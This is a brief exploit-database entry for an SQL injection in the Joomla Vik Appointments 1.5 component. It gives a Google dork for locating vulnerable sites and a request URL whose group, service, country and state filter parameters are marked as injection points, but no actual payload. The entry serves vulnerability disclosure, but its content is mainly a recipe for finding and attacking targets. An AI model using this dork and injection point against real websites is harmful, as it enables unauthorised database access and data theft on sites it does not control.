# # # # # # Exploit Title: Joomla! Component Vik Appointments v1.5 - SQL Injection # Google Dork: inurl:index.php?option=com_vikappointments # Date: 15.03.2017 # Vendor Homepage: https://extensionsforjoomla.com/ # Software : https://extensionsforjoomla.com/livedemo/vikappointments/ # Demo: https://extensionsforjoomla.com/livedemo/vikappointments/ # Version: 1.5 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php/en/our-staff?view=employeeslist&ordering=6&filters[group]=[SQL]&filters[service]=[SQL]&filters[country]=[SQL]&filters[state]=[SQL] # ext4joo_vikappointmentsj3demo # Etc.. # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-03-18]